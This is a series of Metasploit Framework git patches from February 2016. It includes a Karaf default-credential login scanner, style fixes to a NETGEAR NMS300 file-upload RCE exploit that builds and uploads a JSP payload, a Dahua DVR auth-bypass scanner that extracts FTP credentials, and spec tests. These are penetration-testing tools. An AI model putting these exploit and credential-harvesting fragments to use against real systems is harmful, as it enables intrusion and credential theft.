should not + From b2187d3399949b224ee4673c68574fefa3a11bed Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 22 Feb 2016 15:13:47 -0600 Subject: [PATCH 389/686] Fix link I wonder why download.rapid7.com doesn't exist. [ci skip] --- .github/ISSUE_TEMPLATE.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md index a403bc7bcc..dfe8c50c1d 100644 --- a/.github/ISSUE_TEMPLATE.md +++ b/.github/ISSUE_TEMPLATE.md @@ -31,7 +31,7 @@ Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneli ### I installed Metasploit with: - [ ] Kali package via apt - [ ] Omnibus installer (nightly) -- [ ] Commercial/Community installer (from download.rapid7.com) +- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp) - [ ] Source install (please specify ruby version) ### OS From aea68adb7766cc1564578aa30390e0532a4add32 Mon Sep 17 00:00:00 2001 From: HD Moore <x@hdm.io> Date: Mon, 22 Feb 2016 16:29:13 -0600 Subject: [PATCH 390/686] Clarify that contributed code should be BSD/MIT --- CONTRIBUTING.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 7fefad6647..c9ccb13e26 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -37,6 +37,7 @@ and Metasploit's [Common Coding Mistakes]. * **Do** follow the [50/72 rule] for Git commit messages. * **Don't** use the default merge messages when merging from other branches. * **Do** create a [topic branch] to work on instead of working directly on `master`. +* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT. ### Pull Requests From 07ac13326ede4f8271d9b3653d10ca129192b7b5 Mon Sep 17 00:00:00 2001 From: dmohanty-r7 <Dev_Mohanty@rapid7.com> Date: Mon, 22 Feb 2016 17:45:09 -0600 Subject: [PATCH 391/686] Allow user to try other login credentials --- modules/auxiliary/scanner/karaf/login.rb | 27 ++++++++++++++---------- 1 file changed, 16 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/karaf/login.rb b/modules/auxiliary/scanner/karaf/login.rb index 1749d4379f..3191c06027 100644 --- a/modules/auxiliary/scanner/karaf/login.rb +++ b/modules/auxiliary/scanner/karaf/login.rb @@ -36,7 +36,8 @@ class Metasploit3 < Msf::Auxiliary # TODO Set default user, pass Opt::RPORT(8101), OptString.new('USERNAME', [true, 'Username', 'karaf']), - OptString.new('PASSWORD', [true, 'Password', 'karaf']) + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptBool.new('TRYDEFAULTCRED', [false, 'Specify whether to try default creds', true]) ], self.class ) @@ -97,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary Timeout.timeout(5) do proof = ssh_socket.exec!("shell:info\n").to_s end - rescue ::Exception + rescue Timeout::Error end proof end @@ -107,10 +108,20 @@ class Metasploit3 < Msf::Auxiliary print_status("Attempting login to #{ip}:#{rport}...") cred_collection = Metasploit::Framework::CredentialCollection.new( + blank_passwords: datastore['BLANK_PASSWORDS'], + pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], - username: datastore['USERNAME'] + user_file: datastore['USER_FILE'], + userpass_file: datastore['USERPASS_FILE'], + username: datastore['USERNAME'], + user_as_pass: datastore['USER_AS_PASS'] ) + if datastore['TRYDEFAULTCRED'] + cred_collection.additional_privates << 'karaf' + cred_collection.additional_publics << 'karaf' + end + scanner = Metasploit::Framework::LoginScanner::SSH.new( host: ip, port: rport, @@ -135,18 +146,12 @@ class Metasploit3 < Msf::Auxiliary credential_data[:core] = credential_core create_credential_login(credential_data) session_setup(result, scanner.ssh_socket) - :next_user when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT - if datastore['VERBOSE'] - print_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}" - end + vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}" scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? invalidate_login(credential_data) - :abort when Metasploit::Model::Login::Status::INCORRECT - if datastore['VERBOSE'] - print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'" - end + vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'" invalidate_login(credential_data) scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? else From 044b12d3a4c24a3b2a5a6967b8596c6a86b8a8b9 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro <pedrib@gmail.com> Date: Tue, 23 Feb 2016 15:14:04 +0700 Subject: [PATCH 392/686] Made style changes requested by OJ and others --- .../exploits/windows/http/netgear_nms_rce.rb | 49 +++++++++---------- 1 file changed, 23 insertions(+), 26 deletions(-) diff --git a/modules/exploits/windows/http/netgear_nms_rce.rb b/modules/exploits/windows/http/netgear_nms_rce.rb index e7db7ee64c..9e400e9596 100644 --- a/modules/exploits/windows/http/netgear_nms_rce.rb +++ b/modules/exploits/windows/http/netgear_nms_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', 'Description' => %q{ - Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. - The application has a file upload vulnerability that can be exploited by an - unauthenticated remote attacker to execute code as the SYSTEM user. - Two servlets are vulnerable, FileUploadController (located at - /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). - This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and - 1.1.0.13. + Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. + The application has a file upload vulnerability that can be exploited by an + unauthenticated remote attacker to execute code as the SYSTEM user. + Two servlets are vulnerable, FileUploadController (located at + /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). + This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and + 1.1.0.13. }, 'Author' => [ @@ -32,8 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote [ ['CVE', '2016-1525'], ['US-CERT-VU', '777024'], - ['URL', 'TODO_GITHUB_URL'], - ['URL', 'TODO_FULLDISC_URL'] + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Platform' => 'win', @@ -60,9 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }) if res && res.code == 405 - return Exploit::CheckCode::Detected + Exploit::CheckCode::Detected else - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end end @@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote base64_exe = Rex::Text.encode_base64(exe) payload_name = rand_text_alpha(rand(6)+3) - var_raw = rand_text_alpha(rand(8) + 3) - var_ostream = rand_text_alpha(rand(8) + 3) - var_buf = rand_text_alpha(rand(8) + 3) - var_decoder = rand_text_alpha(rand(8) + 3) - var_tmp = rand_text_alpha(rand(8) + 3) - var_path = rand_text_alpha(rand(8) + 3) - var_proc2 = rand_text_alpha(rand(8) + 3) + var_raw = 'a' + rand_text_alpha(rand(8) + 3) + var_ostream = 'b' + rand_text_alpha(rand(8) + 3) + var_buf = 'c' + rand_text_alpha(rand(8) + 3) + var_decoder = 'd' + rand_text_alpha(rand(8) + 3) + var_tmp = 'e' + rand_text_alpha(rand(8) + 3) + var_path = 'f' + rand_text_alpha(rand(8) + 3) + var_proc2 = 'e' + rand_text_alpha(rand(8) + 3) jsp = %Q| <%@page import="java.io.*"%> @@ -102,10 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote %> | - jsp = jsp.gsub(/\n/, '') - jsp = jsp.gsub(/\t/, '') - jsp = jsp.gsub(/\x0d\x0a/, "") - jsp = jsp.gsub(/\x0a/, "") + jsp.gsub!(/[\n\t\r]/, '') return jsp end @@ -115,9 +112,9 @@ class Metasploit3 < Msf::Exploit::Remote jsp_payload = generate_jsp_payload jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) - jsp_full_name = "null" + jsp_name + ".jsp" + jsp_full_name = "null#{jsp_name}.jsp" post_data = Rex::MIME::Message.new - post_data.add_part(jsp_name, nil, nil, "form-data; name=\"name\"") + post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"') post_data.add_part(jsp_payload, "application/octet-stream", 'binary', "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") @@ -130,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) - if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name + ".jsp"}"/ + if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/ print_status("#{peer} - Payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Payload upload failed") From 5710c85a9ebf0f91dec8ea7922fa4dd577a650c2 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro <pedrib@gmail.com> Date: Tue, 23 Feb 2016 15:15:57 +0700 Subject: [PATCH 393/686] Style changes --- .../auxiliary/admin/http/netgear_auth_download.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index 0e78a31723..84fa875840 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit4 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Authenticated File Download', 'Description' => %q{ - Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. - The application has a file download vulnerability that can be exploited by an - authenticated remote attacker to download any file in the system.. - This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. + Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. + The application has a file download vulnerability that can be exploited by an + authenticated remote attacker to download any file in the system.. + This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => [ @@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary [ ['CVE', '2016-1524'], ['US-CERT-VU', '777024'], - ['URL', 'TODO_GITHUB_URL'], - ['URL', 'TODO_FULLDISC_URL'] + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DisclosureDate' => 'Feb 4 2016')) From c191e5b8e1a654bd29117638a66db8e0af8c1c34 Mon Sep 17 00:00:00 2001 From: Tyler Bennett <tyler@talosinfosec.com> Date: Tue, 23 Feb 2016 11:41:12 -0500 Subject: [PATCH 394/686] corrected authors file and cleaned up debug statements --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 310d4c4fd5..bf92bdad98 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -8,13 +8,14 @@ class Metasploit3 < Msf::Auxiliary 'Name' => %q(Dahua DVR Auth Bypass Scanner), 'Description' => %q(Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user's password and clears the device logs), 'Author' => [ + 'Tyler Bennett - Talos Consulting', # Metasploit module 'Jake Reynolds - Depth Security', # Vulnerability Discoverer - 'Tyler Bennett - Talos Infosec', # Metasploit Module 'Jon Hart <jon_hart[at]rapid7.com>', # improved metasploit module 'Nathan McBride' # regex extraordinaire ], 'References' => [ [ 'CVE', '2013-6117' ], + [ 'URL', 'https://talosconsulting.net' ], [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] ], 'License' => MSF_LICENSE, @@ -163,10 +164,10 @@ class Metasploit3 < Msf::Auxiliary server = Regexp.last_match[1].unpack('C*').join('.') port = Regexp.last_match[2].unpack('S') end - if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data + if data =~ /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ ftpuser.strip! ftppass.strip! - unless ftpuser.blank? || ftppass.blank? + if !ftpuser.blank? || !ftppass.blank? print_good("#{peer} -- NAS Server: #{server}") print_good("#{peer} -- NAS Port: #{port}") print_good("#{peer} -- FTP User: #{ftpuser}") From 4eabe432732ca8b0685939a991a5aee7e0aca909 Mon Sep 17 00:00:00 2001 From: Tyler Bennett <tyler@talosinfosec.com> Date: Tue, 23 Feb 2016 12:27:07 -0500 Subject: [PATCH 395/686] fixed issues with capturing regex --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index bf92bdad98..61bf5d4315 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary server = Regexp.last_match[1].unpack('C*').join('.') port = Regexp.last_match[2].unpack('S') end - if data =~ /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ + if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data ftpuser.strip! ftppass.strip! if !ftpuser.blank? || !ftppass.blank? From 6aa6280eff7281d3166fe5c8cf786f4b999b48f5 Mon Sep 17 00:00:00 2001 From: dmohanty-r7 <Dev_Mohanty@rapid7.com> Date: Tue, 23 Feb 2016 13:44:44 -0600 Subject: [PATCH 396/686] Try USERNAME before DEFAULTCRED --- modules/auxiliary/scanner/karaf/login.rb | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/karaf/login.rb b/modules/auxiliary/scanner/karaf/login.rb index 3191c06027..6a692a02b4 100644 --- a/modules/auxiliary/scanner/karaf/login.rb +++ b/modules/auxiliary/scanner/karaf/login.rb @@ -15,6 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner + DEFAULT_USERNAME = 'karaf' + DEFAULT_PASSWORD = 'karaf' + def initialize super( 'Name' => 'Karaf Default Credential Scanner', @@ -35,9 +38,7 @@ class Metasploit3 < Msf::Auxiliary [ # TODO Set default user, pass Opt::RPORT(8101), - OptString.new('USERNAME', [true, 'Username', 'karaf']), - OptString.new('PASSWORD', [true, 'Password', 'karaf']), - OptBool.new('TRYDEFAULTCRED', [false, 'Specify whether to try default creds', true]) + OptBool.new('TRYDEFAULTCRED', [true, 'Specify whether to try default creds', true]) ], self.class ) @@ -118,8 +119,13 @@ class Metasploit3 < Msf::Auxiliary ) if datastore['TRYDEFAULTCRED'] - cred_collection.additional_privates << 'karaf' - cred_collection.additional_publics << 'karaf' + if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank? + cred_collection.add_public(DEFAULT_USERNAME) + cred_collection.add_private(DEFAULT_PASSWORD) + else + cred_collection.username = DEFAULT_USERNAME + cred_collection.password = DEFAULT_PASSWORD + end end scanner = Metasploit::Framework::LoginScanner::SSH.new( From 753e0f769322dd87ef923447e69eb13511ca6984 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 23 Feb 2016 15:34:34 -0600 Subject: [PATCH 397/686] Add rspec for Msf::Util::DocumentGenerator::DocumentNormalizer --- .../document_generator/normalizer_spec.rb | 251 ++++++++++++++++++ 1 file changed, 251 insertions(+) create mode 100644 spec/lib/msf/util/document_generator/normalizer_spec.rb diff --git a/spec/lib/msf/util/document_generator/normalizer_spec.rb b/spec/lib/msf/util/document_generator/normalizer_spec.rb new file mode 100644 index 0000000000..8c8c65394f --- /dev/null +++ b/spec/lib/msf/util/document_generator/normalizer_spec.rb @@ -0,0 +1,251 @@ +require 'rex' +require 'msf/util/document_generator' +require 'msf/util/document_generator/pull_request_finder' + +RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do + + let(:mod_description) { 'MS08-067 netapi double' } + let(:mod_authors) { [ 'sinn3r' ] } + let(:mod_fullname) { 'exploit/windows/smb/ms08_067_netapi' } + let(:mod_shortname) { 'ms08_067_netapi' } + let(:mod_name) { 'MS08-067' } + let(:mod_pull_requests) { good_pull_requests } + let(:mod_refs) { ['URL', 'http://example.com'] } + let(:mod_platforms) { 'win' } + let(:mod_options) { { 'RHOST' => rhost_option } } + let(:mod_normal_rank) { 300 } + let(:mod_type) { 'exploit' } + + let(:good_pull_requests) do + { + '1234' => { title: 'Merged Pull Request' } + } + end + + let(:mod_targets) do + target = double('target') + allow(target).to receive(:name).and_return('Automatic') + [target] + end + + let(:bad_pull_requests) do + exp = Msf::Util::DocumentGenerator::PullRequestFinder::Exception.new + allow(exp).to receive(:message).and_return('GITHUB_OAUTH_TOKEN') + exp + end + + let(:rhost_option) do + owner = double('Msf::Exploit::Remote::SMB::Client') + option = double('Msf::OptAddress') + allow(option).to receive(:name).and_return('RHOST') + allow(option).to receive(:advanced).and_return(false) + allow(option).to receive(:evasion).and_return(false) + allow(option).to receive(:required).and_return(true) + allow(option).to receive(:desc).and_return('The target address') + allow(option).to receive(:default).and_return(nil) + allow(option).to receive(:owner).and_return(owner) + option + end + + let(:msf_mod) do + mod = double('Msf::Module') + mod_info = { 'Author' => mod_authors, 'Platform' => mod_platforms } + allow(mod).to receive(:description).and_return(mod_description) + allow(mod).to receive(:module_info).and_return(mod_info) + allow(mod).to receive(:fullname).and_return(mod_fullname) + allow(mod).to receive(:name).and_return(mod_name) + allow(mod).to receive(:references).and_return(mod_refs) + allow(mod).to receive(:platforms).and_return(mod_platforms) + allow(mod).to receive(:authors).and_return(mod_authors) + allow(mod).to receive(:rank).and_return(mod_normal_rank) + allow(mod).to receive(:options).and_return(mod_options) + allow(mod).to receive(:type).and_return(mod_type) + allow(mod).to receive(:shortname).and_return(mod_shortname) + allow(mod).to receive(:targets).and_return(mod_targets) + mod + end + + + subject do + described_class.new + end + + describe '#get_md_content' do + context 'when metadata is given' do + it 'returns the documentation in HTML' do + items = { + mod_description: msf_mod.description, + mod_authors: msf_mod.send(:module_info)['Author'], + mod_fullname: msf_mod.fullname, + mod_name: msf_mod.name, + mod_pull_requests: good_pull_requests, + mod_refs: msf_mod.references, + mod_rank: msf_mod.rank, + mod_platforms: msf_mod.send(:module_info)['Platform'], + mod_options: msf_mod.options, + mod_demo: msf_mod + } + expect(subject.get_md_content(items, '')).to include('<html>') + end + end + end + + describe '#load_css' do + it 'loads CSS from file' do + expect(subject.send(:load_css)).to include('color: #0069d6') + end + end + + describe '#md_to_html' do + let(:md) do + %Q|# Hello world!| + end + + context 'when a markdown file is given' do + it 'returns the documentation in HTML' do + expect(subject.send(:md_to_html, md, '')).to include('<h1>Hello world!</h1>') + end + end + end + + describe 'normalize_pull_requests' do + context 'when a hash of pull requests are given' do + it 'returns HTML links' do + expect(subject.send(:normalize_pull_requests, good_pull_requests)).to include('* <a href=') + end + end + + context 'when PullRequestFinder::Exception is raised' do + it 'includes a how-to link in the error message' do + how_to_link = 'https://help.github.com/articles/creating-an-access-token-for-command-line-use/' + expect(subject.send(:normalize_pull_requests, bad_pull_requests)).to include(how_to_link) + end + end + end + + describe 'normalize_options' do + context 'when datastore options are given' do + it 'returns a list of options in HTML' do + expect(subject.send(:normalize_options, msf_mod.options)).to include('* RHOST - The target address') + end + end + end + + describe 'normalize_description' do + context 'when a description is a long one-liner' do + it 'returns the wrapped the description' do + desc = 'description ' * 20 + expect(subject.send(:normalize_description, desc)).to include("\ndescription") + end + end + end + + describe 'normalize_authors' do + context 'when an array of authors is given' do + it 'returns the author list in markdown' do + expect(subject.send(:normalize_authors, Rex::Text.html_decode(msf_mod.authors))).to include('* ') + end + end + end + + describe 'normalize_targets' do + context 'when an array of targets is given' do + it 'returns the target list in HTML' do + expect(subject.send(:normalize_targets, msf_mod.targets)).to include('* Automatic') + end + end + end + + describe 'normalize_references' do + context 'when an array of references is given' do + it 'returns the reference list in HTML' do + expect(subject.send(:normalize_references, msf_mod.references)).to include('* <a href=') + end + end + end + + describe 'normalize_platforms' do + context 'when platforms win and linux are given' do + it 'returns the markdown with windows and linux' do + platforms = ['win', 'linux'] + + platforms.each do |platform| + expect(subject.send(:normalize_platforms, platforms)).to include("* #{platform}") + end + end + end + + context 'when a platform as a string is given' do + it 'returns the platform' do + expect(subject.send(:normalize_platforms, msf_mod.platforms)).to eq(mod_platforms) + end + end + end + + describe 'normalize_rank' do + context 'when a rank is given' do + it 'returns the rank' do + expect(subject.send(:normalize_rank, msf_mod.rank)).to include('Normal') + end + + it 'includes a wiki about exploit ranks' do + wiki = 'https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking' + expect(subject.send(:normalize_rank, msf_mod.rank)).to include(wiki) + end + end + end + + describe 'load_template' do + context 'when a BrowserExploitServer demo template path is given' do + it 'returns the demo' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::BES_DEMO_TEMPLATE + expect(subject.send(:load_template, msf_mod, template)).to include('This module is also supported by Browser Autopwn 2') + end + end + end + + describe 'normalize_demo_output' do + context 'when the module is a kind of Msf::Exploit::Remote::HttpServer' do + it 'returns the demo of HTTPSERVER_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::HTTPSERVER_DEMO_TEMPLATE + expect(subject.send(:load_template, msf_mod, template)).to include("use #{mod_fullname}") + end + end + + context 'when the module is a kind of Msf::Exploit::Local' do + it 'returns the content of LOCALEXPLOIT_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::LOCALEXPLOIT_DEMO_TEMPLATE + expect(subject.send(:load_template, msf_mod, template)).to include('To run a local exploit, make sure you are at the msf prompt.') + end + end + + context 'when the module is a kind of Msf::Post' do + it 'returns the demo of POST_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::POST_DEMO_TEMPLATE + expect(subject.send(:load_template, msf_mod, template)).to include('There are two ways to execute this post module') + end + end + + context 'when the module is a kind of Msf::Payload' do + it 'returns the demo of PAYLOAD_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::PAYLOAD_TEMPLATE + expect(subject.send(:load_template, msf_mod, template)).to include('> generate') + end + end + + context 'when the module is a kind of Msf::Auxiliary::Scanner' do + it 'returns the demo of AUXILIARY_SCANNER_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::AUXILIARY_SCANNER_TEMPLATE + expect(subject.send(:load_template, msf_mod, template)).to include('This module is a scanner module') + end + end + + context 'when the module does not have a known kind' do + it 'returns the demo of GENERIC_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::GENERIC_DEMO_TEMPLATE + expect(subject.send(:load_template, msf_mod, template)).to include('msf exploit') + end + end + end + +end From 16d7b2e6ff2121761e54199c12dce0c0ea5a9092 Mon Sep 17 00:00:00 2001 From: Tyler Bennett <tyler@talosinfosec.com> Date: Tue, 23 Feb 2016 17:37:47 -0500 Subject: [PATCH 398/686] cleaned up unless code for nas module and setup ftpuser and ftppass to only if non blank --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 24 +++++++++---------- 1 file changed, 11 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 61bf5d4315..ff77c15ccc 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -167,19 +167,17 @@ class Metasploit3 < Msf::Auxiliary if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data ftpuser.strip! ftppass.strip! - if !ftpuser.blank? || !ftppass.blank? - print_good("#{peer} -- NAS Server: #{server}") - print_good("#{peer} -- NAS Port: #{port}") - print_good("#{peer} -- FTP User: #{ftpuser}") - print_good("#{peer} -- FTP Pass: #{ftppass}") - report_creds( - host: server, - port: port, - user: ftpuser, - pass: ftppass, - type: "FTP", - active: true) - end + print_good("#{peer} -- NAS Server: #{server}") + print_good("#{peer} -- NAS Port: #{port}") + print_good("#{peer} -- FTP User: #{ftpuser}") unless ftpuser.blank? + print_good("#{peer} -- FTP Pass: #{ftppass}") unless ftppass.blank? + report_creds( + host: server, + port: port, + user: ftpuser, + pass: ftppass, + type: "FTP", + active: true) end end From ff3a554b4d36fcea2af697233ed6cb5b10a9a5fe Mon Sep 17 00:00:00 2001 From: Tyler Bennett <tyler@talosinfosec.com> Date: Wed, 24 Feb 2016 13:53:30 -0500 Subject: [PATCH 399/686] added an unless to wrap around the print and report_creds func for nas module to only execute if ftpuser and ftppass is non-blank --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 24 ++++++++++--------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index ff77c15ccc..d6ac38f372 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -167,17 +167,19 @@ class Metasploit3 < Msf::Auxiliary if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data ftpuser.strip! ftppass.strip! - print_good("#{peer} -- NAS Server: #{server}") - print_good("#{peer} -- NAS Port: #{port}") - print_good("#{peer} -- FTP User: #{ftpuser}") unless ftpuser.blank? - print_good("#{peer} -- FTP Pass: #{ftppass}") unless ftppass.blank? - report_creds( - host: server, - port: port, - user: ftpuser, - pass: ftppass, - type: "FTP", - active: true) + unless ftpuser.blank? || ftppass.blank? + print_good("#{peer} -- NAS Server: #{server}") + print_good("#{peer} -- NAS Port: #{port}") + print_good("#{peer} -- FTP User: #{ftpuser}") + print_good("#{peer} -- FTP Pass: #{ftppass}") + report_creds( + host: server, + port: port, + user: ftpuser, + pass: ftppass, + type: "FTP", + active: true) + end end end From b32f474e998638ab338620aaae224fffbda27c67 Mon Sep 17 00:00:00 2001 From: Metasploit <metasploit@rapid7.com> Date: Wed, 24 Feb 2016 11:37:42 -0800 Subject: [PATCH 400/686] Bump version of framework to 4.11.13 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c0937476b4..57d77ab0d9 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.12) + metasploit-framework (4.11.13) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 76417d3584..37ce83291f 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.12" + VERSION = "4.11.13" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 814d53aee040054a914265f410b8cc518784e81b Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Wed, 24 Feb 2016 15:13:04 -0600 Subject: [PATCH 401/686] Add rspec for Msf::Util::DocumentGenerator::PullrequestFinder --- .../pull_request_finder_spec.rb | 161 ++++++++++++++++++ 1 file changed, 161 insertions(+) create mode 100644 spec/lib/msf/util/document_generator/pull_request_finder_spec.rb diff --git a/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb new file mode 100644 index 0000000000..7c224831b6 --- /dev/null +++ b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb @@ -0,0 +1,161 @@ +require 'rex' +require 'msf/util/document_generator' +require 'octokit' +require 'net/http' + +RSpec.describe Msf::Util::DocumentGenerator::PullRequestFinder do + + let(:author_name) { 'name' } + + let(:commit) do + c = double('commit') + allow(c).to receive(:author).and_return({author: author_name, login: author_name}) + allow(c).to receive(:sha).and_return('sha') + c + end + + let(:commits) do + [ commit ] + end + + let(:pr_num) { '5486' } + + let(:html) do + %Q| + <html> + <head></head> + <body> + <li class="pull-request">(<a href="/rapid7/metasploit-framework/pull/#{pr_num}" title="Merged Pull Request: adobe_flash_copy_pixels_to_byte_array: Execution from the flash renderer / Windows 